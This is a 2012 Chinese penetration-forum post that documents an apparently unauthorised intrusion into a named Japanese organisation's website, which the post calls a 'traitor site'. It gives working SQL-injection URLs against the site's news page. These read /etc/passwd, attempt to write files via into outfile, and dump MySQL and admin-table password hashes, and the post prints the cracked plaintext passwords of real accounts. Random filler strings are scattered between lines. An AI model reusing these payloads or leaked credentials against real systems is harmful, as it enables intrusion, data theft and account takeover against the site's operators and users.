中国网络渗透测试联盟
标题:
原创 检测汉奸站全过程
[打印本页]
作者:
xiancda
时间:
2012-9-17 16:22
标题:
原创 检测汉奸站全过程
补:
www.zuaa.jp
测试
: N ?9 U8 c: G6 m7 w) B
. V6 ?9 ?: b9 P% Y$ A3 Q- l: l
0x01. 检测
www.zuaa.jp
收集数据
, T2 B/ g9 U/ ~' ?6 Y' d% [+ U5 b4 G
[attach]73[/attach]
: i. x2 _: g9 P% y" |3 B7 O
# e, ~+ t- B( @: F( F
whatweb
4 M: f" V4 P8 B; X. j
[attach]74[/attach]
6 \# P( d0 k5 T$ V3 V
& U) ?9 T* A( E. m" i# b9 d4 V
利用NMAP扫描
' X1 h: T0 |) V% L. K4 U# j
[attach]75[/attach]
8 F* I9 } j9 t& o6 Q% _/ ?2 y7 R
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
4 A1 m* k" A* H+ _) R" @
0x02.找注入点
/ U$ J1 F& Z6 Q
找注入点:
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
6 ?, Z& S' S3 ]. G, ~
[attach]76[/attach]
8 F) R8 l7 m. w0 G3 z( ^
: g' F e$ e- X0 P4 @0 c# J# A5 [- a
0x03.order by
) Z. o; Y1 P8 w& G
http://www.zuaa.jp/php/newsdetail.php?topic_id=390
order by 1
7 Y5 D, Y' g& B# N2 f3 ]4 X, V- R& }
[attach]77[/attach]
! P3 L0 _8 G8 b5 H& ]- ^! ]$ k/ y
order by 28报错,order by 27正常
) Q" j4 L4 x% R3 S
, D2 j2 z [/ }" [7 j' n
0x04. union手动查询
e5 D h) }7 Q) K5 j9 \; b
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
3 a/ {( g+ r7 k8 a
添加到 27 时正常显示
" W* z |6 U$ N! e2 G( G) y, c `
[attach]78[/attach]
9 X3 @: [0 B) A n
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
* h5 Y* |0 i, E1 K7 o
+ b8 w' ~& u7 c6 r# D* E
0x05. info:
# d1 w" K1 Q& r2 `, z. X4 j
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
; h% X+ H% ~9 f) y
[attach]79[/attach]
( E5 x" `, P R; E _& Z
user: root@localhost
$ Q ?$ O8 P$ f9 i. [9 Q5 o
database: openpne
5 |8 [) B4 }1 }" d' }: J/ e& J' _
version: 4.1.22
0 e! M' L1 b7 j2 {4 s1 {
os: portbld-freebsd5.4
$ @) A5 a$ q4 W( M
$ m# d, R+ a2 J, x* s
0x06. root用户
+ `: b/ Z6 E6 E9 X1 h& T
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
: a0 g4 ~ p4 s% Y6 b z
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
" @4 ?$ @. P; F; z0 Q+ k
[attach]80[/attach]
* k/ b% D! ~ }2 i- d$ Q
通过工具转换
$ A" J' k) E: Z& O; d6 a
[attach]81[/attach]
7 p% x X4 j9 N# J( S% t
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
- a* V+ k* j+ ^7 O9 d
0 ]" p' }! ^ x- H9 S- |
0x07. 利用 into outfile
) l/ R1 P% U+ f: q a/ C: N
全部都失败
: j7 E) |$ J. W8 ?
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
$ G& M8 n1 L! K N2 m8 d; A
# l F% u# k- y
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
0 N4 w/ r: K$ `: C$ J Y% ?
# { e5 @8 Z* C( t2 h! Q
页面显示“MDB2 Error:syntax error”
9 a; a5 h$ M) O
+ j/ i1 S% G' z9 l8 Z
0x08. 利用 mysql 4.1
& ~$ H, }: I; g4 F4 h
猜常规表名,字段未果 工具 sqlmap
5 ^6 R; @! ~( K+ A8 M
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
3 T& @- F. ?7 T% e! p
; M1 O/ D/ E6 C
[attach]82[/attach]
& B c) w" F4 ~2 i
% D; l9 }7 B j. H+ ?
0x09. 查找后台
$ [. b, G5 ~0 z
利用 现有的各种 后台工具尝试都不行
1 @5 z- `- B7 D$ ~; a2 b ~9 g$ s
5 }5 H; J+ |3 F% n% w) O1 p
0x10. MySL外联方法
* E& D- F) J t6 o( o/ b
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连
www.zuaa.jp
不行
4 J- @! \0 c" o
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
# G9 \ E* ]5 w% ^& Y1 ]6 H$ M
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
5 D: s, O; ]# Q: H( X, @
[attach]83[/attach]
/ F+ Z6 a3 d0 W
这个可以在
www.cmd5.com
解密
0 d- p1 |# K$ I E! [- G$ v2 W
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009
& ~" }3 w. S2 t9 M- U( C" E: M+ l
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
( E( y% ]& E4 A) H- k2 z+ T
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???
8 c0 O$ t* L; |! Y: z# k N) q
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
( E& ^. t3 c# K d0 [- c
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
9 w( i0 j* K# o9 @, @. y
[attach]84[/attach]
1 I( T2 U0 T+ w( x! \1 `" @; A
: k3 H# F* k1 I( @) ]9 i9 x
0x11. 网站突破
7 @; ]+ F3 d- }8 e4 s
发现网站的源程序 openpne, google 下载 openpne 源码
% C t) X5 @/ I. s2 D* y9 b) `7 F
[attach]85[/attach]
, O' x) }3 r- s5 f2 u" a* \
: G g7 O, @. L: d0 Q1 K0 ` b
0x12. 默认信息利用
; [) l4 V/ L P* w4 r9 {3 m8 j/ M
http://sns.zuaa.jp/?m=admin&a=page_login
; D4 I3 @5 ~' @; s
[attach]86[/attach]
4 C3 I: g- T7 J! P3 f5 W# P ~, D
表名 (c_admin_user) ,字段名(username,password)
8 j+ `; d, V; n0 l$ H/ b
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
0 P4 ^) H# Q$ k: z, F1 ~
[attach]87[/attach]
2 S1 P3 U9 `: J" }- r( A( w
解密
) N6 c) j' |/ o* t# }) y$ P! ~
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda, zuaa2009
3 f4 A5 b0 [# G8 L8 x; I
zuaajp:c0923ec5857796a393da99905008c176, zju1897
7 W/ z. L: H# @$ ]
g! X w/ T) q( ~4 x% o* F
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
$ u, }$ n# |8 l# @! g
+ h3 i+ |$ D. j" _ i
0x13. 登录后台
* C) r" F3 {) D1 m5 R
[attach]88[/attach]
N W! x. p6 g! r3 n
% G m; ~! S" g" u6 U! N9 k6 q
/ F( c' ~/ T! R
0x14. 小结
: Y( D, s( ~1 `; u" ^! C3 C
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
/ m% z3 W2 ]! w2 P- i' L8 T
感谢群 ----
渗透 -酷帅王子
提供注入点 提供注入点
4 c6 u. p! x5 ]8 M8 q9 W
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------
By DarkRain
- t* d$ y( n0 M
中国网络渗透测评联盟
:
http://www.political-security.com/
提供技术支持
! k. |' }# v# B, b$ n. K
- ?4 j- Z! h) l. u% K
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
) J3 k z; Z0 k, g: x) K( L
作者:
荒村狂客
时间:
2012-9-19 08:27
哪个牛人 费的这劲 入侵的
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2